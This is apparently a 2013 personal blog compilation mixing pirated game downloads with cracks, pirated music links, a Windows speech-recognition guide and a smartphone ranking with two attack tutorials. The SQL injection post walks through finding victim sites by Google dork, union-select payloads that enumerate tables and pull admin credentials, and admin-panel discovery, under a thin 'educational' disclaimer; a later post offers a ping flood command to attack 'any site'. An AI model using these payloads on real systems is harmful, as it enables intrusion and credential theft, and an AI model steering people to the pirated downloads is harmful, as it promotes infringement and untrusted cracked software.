Saturday 25 May 2013

SAINTS ROW THE THIRD 8.5GB

Saints Row: The Third - PC Game


Saints Row: The Third

  • Developer: Volition
  • Publisher: THQ
  • Genre: Action
  • Release Date: November 15, 2011 (US)

Saints Row: The Third

Years after taking Stilwater for their own, the Third Street Saints have evolved from street gang to household brand name, with Saints sneakers, Saints energy drinks and Johnny Gat bobble head dolls all available at a store near you. The Saints are kings of Stilwater, but their celebrity status has not gone unnoticed. The Syndicate, a legendary criminal fraternity with pawns in play all over the globe, has turned its eye on the Saints and demands tribute.

Minimum System Requirements

  • OS: Windows XP/Vista/7
  • Processor: Intel Core 2 Duo @ 2.0 Ghz / AMD Athlon 64 X2 4200+
  • Memory: 2 Gb
  • Hard Drive: 15 Gb free
  • Video Memory: 256 Mb
  • Video Card: nVidia GeForce 8600 / ATI Radeon HD 2600 Pro
  • Sound Card: DirectX Compatible
  • Network: Broadband Internet Connection for Online Multiplayer
  • DirectX: 9.0c
  • Keyboard
  • Mouse
  • DVD Rom Drive

Recommended System Requirements

  • OS: Windows 7
  • Processor: Intel Core i5 @ 2.66 GHz / AMD Phenom II X4 @ 2.8 GHz
  • Memory: 4 Gb
  • Hard Drive: 15 Gb free
  • Video Memory: 1 Gb
  • Video Card: nVidia GeForce GTX 460 / ATI Radeon HD 5850
  • Sound Card: DirectX Compatible
  • Network: Broadband Internet Connection for Online Multiplayer
  • DirectX: 10
  • Keyboard
  • Mouse
  • DVD Rom Drive





Download Saints Row: The Third – Direct Links

Part 1 – 700 MB

Part 2 – 700 MB

Part 3 – 700 MB

Part 4 – 700 MB

Part 5 – 700 MB

Part 6 – 700 MB

Part 7 – 700 MB

Part 8 – 700 MB

Part 9 – 700 MB

Part 10 – 700 MB

Part 11 – 700 MB

Part 12 – 700 MB

Part 13 – 167 MB

Crack

Tuesday 21 May 2013

HOW TO DOWNLOAD



How to Download

Hi Gamers,

While you are at the download website, which is FREE unless you wanna support us "Click on Ads".

1) Scroll down. Wait 10 Seconds before your actual download link is available.


2) Next you'll be redirected to another page where the download link is. Click on "Bingo!"

ASSASIN'S CREED BROTHERHOOD.


READ THE "HOW TO DOWNLOAD SECTION" IF U GET ANY TROUBLE!!

Assassin's Creed: Brotherhood


Assassin's Creed: Brotherhood

  • Publisher: Ubisoft
  • Developer: Ubisoft Montreal
  • Release Date: March 17, 2010 (US)
  • Genre: Action
About Assassin's Creed: Brotherhood

Now a legendary Master Assassin, Ezio must journey into Italy's greatest city, Rome, center of power, greed and corruption to strike at the heart of the enemy. Defeating the corrupt tyrants entrenched there will require not only strength, but leadership, as Ezio commands an entire Brotherhood that will rally to his side. Only by working together can the Assassins defeat their mortal enemies.
Assassin’s Creed Brotherhood Minimum System Requirements
  • OS: Windows® XP (32-64 bits) /Windows Vista®(32-64 bits)/Windows 7® (32-64 bits)
  • CPU: Intel Core® 2 Duo 1.8 GHZ or AMD Athlon X2 64 2.4GHZ
  • RAM: 1.5 GB Windows® XP / 2 GB Windows Vista® - Windows 7®
  • VIDEO: 256 MB DirectX® 9.0-compliant card with Shader Model 3.0 or higher (see supported list*)
  • DX: 9.0
  • HARD DRIVE: 8 GB
  • SOUND: DirectX 9.0 -compliant sound card
  • PERIPHERALS: Keyboard, mouse, optional controller
  • Supported Video Cards: ATI® RADEON® HD 2000/3000/4000/5000/6000 series, NVIDIA GeForce® 8/9/100/200/300/400/500 series
  • Note* * This product does not support Windows® 98/ME/2000/NT
Assassin’s Creed Brotherhood Recommended System Requirements
  • OS: Windows® XP (32-64 bits) /Windows Vista®(32-64 bits)/Windows 7® (32-64 bits)
  • CPU: Intel Core® 2 Duo E6700 2.6 GHz or AMD Athlon 64 X2 6000+ or better
  • RAM: 1.5 GB Windows® XP / 2 GB Windows Vista® - Windows 7®
  • VIDEO: GeForce 8800 GT or ATI Radeon HD 4700 or better
  • SOUND: 5.1 sound card
  • PERIPHERALS: joystick optional (Xbox 360® Controller for Windows recommended)
  • Supported Video Cards: ATI® RADEON® HD 2000/3000/4000/5000/6000 series, NVIDIA GeForce® 8/9/100/200/300/400/500 series
  • Note* * This product does not support Windows® 98/ME/2000/NT
Assassin's Creed Brotherhood (1)
Assassin's Creed Brotherhood (2)
Assassin's Creed Brotherhood (3)
Assassin's Creed Brotherhood (4)
Assassin's Creed Brotherhood (5)

Download Assassin's Creed: Brotherhood – Direct Links

CRACK

 

 If you like this game. Like us on facebook.

Monday 20 May 2013

HOW TO EXECUTE AN SQL INJECTION


What is SQL Injection?
SQL injection is one of the popular web application hacking method.  Using the SQL Injection attack, an unauthorized person can access the database of the website. Attacker can extract the data from the Database.

What a hacker can do with SQL Injection attack?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

So, here we go.

Step 1: Finding Vulnerable Website:
To find a SQL Injection vulnerable site, you can use Google search by searching for certain keywords. Those keyword often referred as 'Google dork'.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A...t.zip.html

Copy one of the above keyword and paste in the google. Here , we will got lot search result with
We have to visit the websites one by one for checking the vulnerability.




Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:
site:www.victimsite.com inurl:index.php?id=
 Step 2: Checking the Vulnerability:
Now let us check the vulnerability of the target website. To check the vulnerability , add the single quotes(') at the end of the url and hit enter.

For eg:
http://www.victimsite.com/index.php?id=2'
If the page remains in same page or showing that page not found, then it is not vulnerable.

If you got an error message just like this, then it means that the site is vulnerable
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:
Great, we have found that the website is vulnerable to SQLi attack.  Our next step is to find the number of columns present in the target database.

For that replace the single quotes(') with "order by n" statement.

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg:
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
If you get the error while trying the "x"th number,then no of column is "x-1".

I mean:
http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)

 
 so now x=8 , The number of column is x-1 i.e, 7.

In case ,if the above method fails to work for you, then try to add the "--" at the end of the statement.
For eg:
http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Find the Vulnerable columns:
We have successfully discovered the number of columns present in the target database.  Let us find  the vulnerable column by trying the query "union select columns_sequence".

Change the id value to negative(i mean id=-2).  Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
Once you execute the query, it will display the vulnerable column.



Bingo,  column '3' and '7' are found to be vulnerable.  Let us take the first vulnerable column '3' . We can inject our query in this column.

Step 5: Finding version,database,user
Replace the 3 from the query with "version()"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
Now, It will display the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table Name
If the Database version is 5 or above. If the version is 4.x, then you have to guess the table names (blind sql injection attack).

Let us find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Now it will display the list of table names. Find the table name which is related with the admin or user.




Let us choose the "admin " table.

Step 7: Finding the Column Name

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

We have to convert the table name to MySql CHAR() string .

Install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/

Once you installed the add-on, you can see a toolbar that will look like the following one. If you are not able to see the Hackbar, then press F9.

Select sql->Mysql->MysqlChar() in the Hackbar.


It will ask you to enter string that you want to convert to MySQLCHAR().  We want to convert the table name to MySQLChar .  In our case the table name is 'admin'.



Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.



Copy and paste the code at the end of the url instead of the "mysqlchar"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
The above query will display the list of column.

For example: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace the replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).

Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
If the above query displays the 'column is not found' erro, then try another column name from the list.

If we got luck, then it will display the data stored in the database depending on your column name.  For instance, username and password column will display the login credentials stored in the database.

Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc.
If you got luck ,you will find the admin page using above urls. or you can some kind of admin finder tools.

Warning:
The above post is completely for educational purpose only.  Never attempt to follow the above steps against third-party websites.  If you want to learn SQL injection attack method , then you can learn in safe environment by setup your own lab.

In this article, i just explained how to attack SQL injection vulnerable site in a n00b(newbie) way. If you want to become PenTester, you must know how these attacks works. In my next article, i will explain the SQL Injection depth.

Injection Prevention - mysql_real_escape_string()

Lucky for you, this problem has been known for a while and PHP has a specially-made function to prevent these attacks. All you need to do is use the mouthful of a function mysql_real_escape_string.
What mysql_real_escape_string does is take a string that is going to be used in a MySQL query and return the same string with all SQL Injection attempts safely escaped. Basically, it will replace those troublesome quotes(') a user might enter with a MySQL-safe substitute, an escaped quote \'.
Lets try out this function on our two previous injection attacks and see how it works.

MySQL & PHP Code:

//NOTE: you must be connected to the database to use this function!
// connect to MySQL

$name_bad = "' OR 1'"; 

$name_bad = mysql_real_escape_string($name_bad);

$query_bad = "SELECT * FROM customers WHERE username = '$name_bad'";
echo "Escaped Bad Injection: <br />" . $query_bad . "<br />";


$name_evil = "'; DELETE FROM customers WHERE 1 or username = '"; 

$name_evil = mysql_real_escape_string($name_evil);

$query_evil = "SELECT * FROM customers WHERE username = '$name_evil'";
echo "Escaped Evil Injection: <br />" . $query_evil;

Display:

Escaped Bad Injection:
SELECT * FROM customers WHERE username = '\' OR 1\''
Escaped Evil Injection:
SELECT * FROM customers WHERE username = '\'; DELETE FROM customers WHERE 1 or username = \''
Notice that those evil quotes have been escaped with a backslash \, preventing the injection attack. Now all these queries will do is try to find a username that is just completely ridiculous:
  • Bad: \' OR 1\'
  • Evil: \'; DELETE FROM customers WHERE 1 or username = \'
And I don't think we have to worry about those silly usernames getting access to our MySQL database. So please do use the handy mysql_real_escape_string() function to help prevent SQL Injection attacks on your websites. You have no excuse not to use it after reading this lesson!


http://205.196.122.54/2wuk42tlasxg/0a2h0r7qr5326da/002-+Rihanna+-+Diamonds.mp3
 http://205.196.122.20/psxnnfbhb5lg/0a2h0r7qr5326da/002-+Rihanna+-+Diamonds.mp3

 <a href="http://www.mediafire.com/folder/ltb27b1y5885o/Music" target="_blank">http://www.mediafire.com/folder/ltb27b1y5885o/Music</a>


 http://www.mediafire.com/folder/ltb27b1y5885o/Music

http://3klinks.com/m1.php?id=4821

Sunday 19 May 2013

HOW TO CARRY OUT A DENIAL OF SERVICE ATTACK!!







Before you can attempt this you need to know alittle about DoS.

What is a denial-of-service (DoS) attack?

In a denial-of-service (DoS) attack, an attacker attempts to prevent legitimate users from accessing information or services. By targeting your computer and its network connection, or the computers and network of the sites you are trying to use, an attacker may be able to prevent you from accessing email, websites, online accounts (banking, etc.), or other services that rely on the affected computer.
The most common and obvious type of DoS attack occurs when an attacker "floods" a network with information. When you type a URL for a particular website into your browser, you are sending a request to that site's computer server to view the page. The server can only process a certain number of requests at once, so if an attacker overloads the server with requests, it can't process your request. This is a "denial of service" because you can't access that site.
An attacker can use spam email messages to launch a similar attack on your email account. Whether you have an email account supplied by your employer or one available through a free service such as Yahoo or Hotmail, you are assigned a specific quota, which limits the amount of data you can have in your account at any given time. By sending many, or large, email messages to the account, an attacker can consume your quota, preventing you from receiving legitimate messages.

What is a distributed denial-of-service (DDoS) attack?

In a distributed denial-of-service (DDoS) attack, an attacker may use your computer to attack another computer. By taking advantage of security vulnerabilities or weaknesses, an attacker could take control of your computer. He or she could then force your computer to send huge amounts of data to a website or send spam to particular email addresses. The attack is "distributed" because the attacker is using multiple computers, including yours, to launch the denial-of-service attack.

How do you avoid being part of the problem?

Unfortunately, there are no effective ways to prevent being the victim of a DoS or DDoS attack, but there are steps you can take to reduce the likelihood that an attacker will use your computer to attack other computers:
  • Install and maintain anti-virus software (see Understanding Anti-Virus Software for more information).
  • Install a firewall, and configure it to restrict traffic coming into and leaving your computer (see Understanding Firewalls for more information).
  • Follow good security practices for distributing your email address (see Reducing Spam for more information). Applying email filters may help you manage unwanted traffic.

How do you know if an attack is happening?

Not all disruptions to service are the result of a denial-of-service attack. There may be technical problems with a particular network, or system administrators may be performing maintenance. However, the following symptoms could indicate a DoS or DDoS attack:
  • unusually slow network performance (opening files or accessing websites)
  • unavailability of a particular website
  • inability to access any website
  • dramatic increase in the amount of spam you receive in your account

What do you do if you think you are experiencing an attack?

Even if you do correctly identify a DoS or DDoS attack, it is unlikely that you will be able to determine the actual target or source of the attack. Contact the appropriate technical professionals for assistance.
  • If you notice that you cannot access your own files or reach any external websites from your work computer, contact your network administrators. This may indicate that your computer or your organization's network is being attacked.
  • If you are having a similar experience on your home computer, consider contacting your internet service provider (ISP). If there is a problem, the ISP might be able to advise you of an appropriate course of action.

How To Carry Out DoS Attack With CMD !!

 DoS attackes can target end-user systems, servers, routers and Network links(websites)
Requirments:
1- Command Prompt (CMD or DOS) Which is usually integrated in all Windows.
2- Ip-Address of Targeted Site.
How TO GET IP OF ANY SITE??
No problem.. here is the solution..
open ur CMD (command prompt).. and type
————————————————–
nslookup Site-Name
————————————————–

(e.g nslookup www.google.com)
It will show u ip of the site.
ohk now write this command in CMD For Attack on Any Site/ Server..

—————————————————
ping SITE-IP -l 65500 -n 10000000 -w 0.00001
—————————————————

-n 10000000= the number of DoS attemps.. u can change the value “10000000″ with ur desired value u want to attempt attack.

SITE-IP= Replace the text with the ip address of the site u want to be attacked..
-w 0.00001 = It is the waiting time after one ping attack.
NOTE: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack!!

—————
This All System Is Known As “PING OF DEATH”
—————

DICTATING TO YOUR PC




Tell me what you want

A beginner's guide to Windows Speech Recognition

At first I was skeptical. Sitting back and talking to my computer seemed odd to me, a little too much out of a science-fiction movie. The first time I tried Windows Speech Recognition, I made sure to close the door to my office, lest everyone in the hallway think I'd lost my mind. But then a funny thing happened—it worked. I could start programs, move between open windows, and even write e‑mail, all without touching my mouse or keyboard. Once I got past thinking that I needed to talk like a computer to talk to my computer, I found that it was pretty easy and started to see what all the fuss was about.
In the past, speech recognition programs were used primarily by people who had difficulty manipulating a mouse and typing on a keyboard. With this version of Windows, speech recognition has become a more mainstream business program.

Note

  • Speech Recognition is available only in English, French, Spanish, German, Japanese, Simplified Chinese, and Traditional Chinese.

What you need

Besides your voice, the most important piece of equipment that you need to get started with Windows Speech Recognition is a good microphone. While many new laptops have microphones built in, it’s better to get a separate microphone that's dedicated to speech recognition. A USB microphone can provide the best fidelity, but a mike that plugs into a mini-jack on your computer should work well enough.
Consider getting a headset microphone. Unlike a microphone that sits on your desk, a headset mike allows you to move around—and if you’re going to use Windows Speech Recognition a lot, that’s something you’ll want. Also, headset microphones are less prone to making mistakes because they stay a consistent distance from your mouth as you talk.
You’ll also want a consistent environment, without a lot of external noise that your microphone might pick up. As you use Windows Speech Recognition, you’ll train it to filter out sounds from your environment; but it’s good to start out with as quiet an environment as possible.

Getting started

Now that you have your microphone, it’s time to dive in. Fortunately, setting up Speech Recognition is pretty easy. Here’s how to do it:
  1. Open Speech Recognition Options by clicking the Start button Picture of the Start button, clicking Control Panel, clicking Ease of Access, and then clicking Speech Recognition Options.
  2. Click Start Speech Recognition.
    Picture of Speech Recognition Options in Control PanelPicture of Speech Recognition Options
The first thing that Speech Recognition will ask you to do is set up your microphone. Before you start, make sure that your microphone is plugged in and positioned where you plan to use it.
Once your microphone is set up, the Set up Speech Recognition wizard will guide you through a series of questions. When you’re finished, you can choose to take a tutorial.
It's worth your time to run through the Speech Tutorial for a couple of reasons. First, the tutorial will help you understand how best to interact with your computer using Windows Speech Recognition. Also, as you run through the tutorial, the computer will begin building your speech profile, which makes Speech Recognition more accurate.

Tell the computer what you want to do

Once you’ve got Speech Recognition up and running, the first task is getting the computer to do what you want. This is surprisingly easy. In general, when you see an item on your screen that you want to interact with, say what you want the item to do, followed by the item’s name. For example, to open your Pictures folder you would say "Start," and then "Pictures."
Picture of Windows Speech RecognitionPicture of Windows Speech Recognition
It’s similar if you know the name of a program that you want to open or switch to. For example, you can say "Open Solitaire" or "Switch to Internet Explorer."
If you don't know the name of an item (such as a file or folder) that you want to work with, you can say "show numbers" and numbers will appear next to every item on the screen. Simply say what you want to do with an item, followed by its number. For example, you might say "double-click five" to open the item with that number.
To use Windows Speech Recognition for browsing the Internet, you need to figure out what the items in the web browser are called and say the commands you need to interact with them.
To enter the address of a website, say "Go to address," and then dictate the address of the website that you want to visit. If you've entered the address before, say "address," and then choose a previously entered address.

Tell the computer what you want to say

Computer, take a letter. Well, it’s not quite that easy, but for many people one of the pleasures of speech recognition is being able to dictate. From a simple e‑mail message to a complex document, using dictation to get your words into your computer can be faster than typing.
Most programs accept text dictation automatically. All you need to do is start the program and then begin dictating. It’s important to speak clearly, and it works best to speak in complete sentences. Keep in mind that punctuation isn’t automatically added when you dictate text, so you have to tell the computer where to add punctuation. The Speech Tutorial has a great primer on the ins and outs of dictating text. If the program you’re using doesn’t automatically accept dictation, you can enable it by selecting Enable dictation anywhere on the Speech Recognition Options page. For more information, see Turn on dictation for all programs.
No matter how good your computer is at recognizing your speech, there will still be occasional errors. Fortunately, with Windows Speech Recognition, you can fix dictation errors on the fly. When you discover a dictation error, you can say "correct," followed by the word or phrase that you want to correct. A dialog box then pops up and provides choices for the most likely corrections. If you don’t see what you want, you can just say the correction that you want to make.
If you find words that Speech Recognition consistently mishears or doesn’t recognize, you can add them to the Speech Dictionary. To open the Speech Dictionary, say "Open Speech Dictionary."

TOP SMARTPHONES IN THE MARKET

You aint living till you get one of these!!

Your smartphone is the one thing that never leaves your side because it can do it all. But the best smartphones do everything well. A great handset takes amazing photos, offers a bright and crisp HD screen and has enough speed to help you multitask with ease. But there’s also plenty of variety out there when it comes to software and the overall user experience. That’s where we come in.
Want something that’s easy to use with one hand and offers a ton of apps? Apple’s iPhone is a no-brainer. Want a bigger screen, more flexibility and more features? Go Android. Meanwhile, Windows Phones offer a dynamic interface ideal for first-time smartphone owners, and the new BlackBerrys make it easy to access messages and social updates in one place.
Once you’ve decided on your platform of choice, then it’s time to pick a device. At LAPTOP we test every major smartphone on the market and rate each one based on design, features, performance and battery life to help you make the right call. Here are our top 10 smartphones, ranging from the most sleek and compact handsets to the biggest phablets.

1. Samsung Galaxy S4 (Multiple Carriers)

The Samsung Galaxy S4 takes Android phones to the next level with an awesome camera, innovative gesture controls and best-in-class multitasking.


2. HTC One (Multiple Carriers) 

The curved aluminum HTC One isn't just the most attractive Android phone yet, it packs a quad-core processor, a fantastic low-light camera and booming stereo speakers. You can even use this device as a TV remote.

Pros: Stunning design; Excellent 1080p display; Loud and rich dual speakers; Remote control functionality for TV; Camera shines in low light; Very fast performance

Cons: Odd button arrangement; No wireless charging; Zoe feels a bit gimmicky; Can be a stretch to operate with one hand

The Verdict: The HTC One's jaw-dropping design, good low-light camera, fresh approach to the home screen and awesome speakers make it a stellar Android phone.

3. Apple iPhone 5 (AT&T, Sprint, and Verizon)

Apple’s top-notch device raises the bar for displays, camera quality, and voice control in a remarkably slim and sexy design.

Pros: Amazingly thin and light; Bigger more vibrant screen; Fast 4G LTE speeds; Very good battery life; Improved camera; Facebook integration and easy photo sharing;

Cons: Half-baked Maps app; Very few interface enhancements

The Verdict: The iPhone 5 improves upon a great smartphone in every way while offering a shockingly thin and light design.



4. Motorola Droid RAZR Maxx HD (Verizon)


A high-capacity battery inside a svelte design makes the Droid RAZR Maxx HD a 4G LTE phone with equal parts speed and endurance.




Pros: Epic battery life; Attractive and durable Kevlar design; Gorgeous 1280 x 720 display; Loud and clear audio; Snappy performance; Fast 4G LTE speeds;

Cons: Camera not as sharp or fast as competition; Expensive; Difficult to access microSD card slot

The Verdict: With a vibrant display, sleek and durable design, and a long-lasting battery, the Motorola Droid RAZR Maxx HD lives up to its name.

5. Samsung Galaxy Note II (AT&T, Sprint, T-Mobile, Verizon)

With its bigger screen, better pen features quad-core CPU and epic battery life, the Galaxy Note II raises the bar for large-screen smartphones.

Pros: Strong graphics and performance; Large display with sharp details and bright colors; Fast camera; Improved S Pen

Cons: Size can be somewhat overwhelming; Slow 3G speeds; A tad pricey

The Verdict: With a bigger screen, faster processor and sharper S Pen, the only thing that can hold back the Galaxy Note II is Sprint's 3G-only network.



6. LG Optimus G Pro (AT&T)

The LG Optimus G Pro boasts a mammoth 5.5-inch screen and a bevy of innovative apps.


Pros: Huge display with wide viewing angles; Strong performance; Fantastic multitasking software; Helpful camera features

Cons: Lacks stylus despite its note-taking software; Cameras struggle in low light; Relatively small keyboard ; TV remote software lacks program guide

The Verdict: The LG Optimus G Pro boasts a mammoth 5.5-inch screen and a bevy of innovative apps.



7. BlackBerry Z10 (AT&T, T-Mobile)

The BlackBerry Z10 offers multitaskers a sleek new interface, a one-stop shop for messaging and social updates and a killer keyboard. Plus, the camera lets you go back in time.



Pros: Slick interface aids multitasking; BlackBerry Hub combines email messaging and social networking; Superior touch keyboard learns as you type; Smart integration of calendar contacts and messaging; BBM supports video chat and screen sharing

Cons: Performance lags at times; Some apps feel watered down compared to iOS and Android; Camera struggles in low light

The Verdict: The BlackBerry Z10 offers a slick, multitasking-friendly interface, killer keyboard and one-stop shop for messaging and social networking, but BlackBerry needs to work out some kinks.

8. Nokia Lumia 920 (AT&T)

The Nokia Lumia 920 is the ultimate Windows Phone, thanks to its jaw-dropping HD screen, fantastic PureView camera and wireless charging capability.

Pros: Slick and colorful design; Superb camera; Eye-popping HD screen; Integrated wireless charging; Useful Nokia apps

Cons: Relatively heavy; App selection still limited compared to Android and iOS; NFC sharing could be easier;

The Verdict: The Nokia Lumia 920 is the ultimate Windows Phone, thanks to its jaw-dropping HD screen, fantastic PureView camera and wireless charging capability.

9. Google Nexus 4 (Multiple Carriers)

The Google Nexus 4's swift performance, bright and crisp display and Android 4.2 software make it a good choice for Android purists, but the lack of 4G LTE is a letdown.

Pros: Sharp 4.7-inch HD screen; Sharp colorful screen with good viewing angles; Improved Google Now assistant; Speedy and smooth performance

Cons: Short battery life; Competitors have more innovative features; Dull camera images ; No LTE support; Mediocre audio quality;

The Verdict: The Google Nexus 4's swift performance, bright and crisp display and Android 4.2 software make it a good choice for Android purists, but the lack of 4G LTE is a letdown.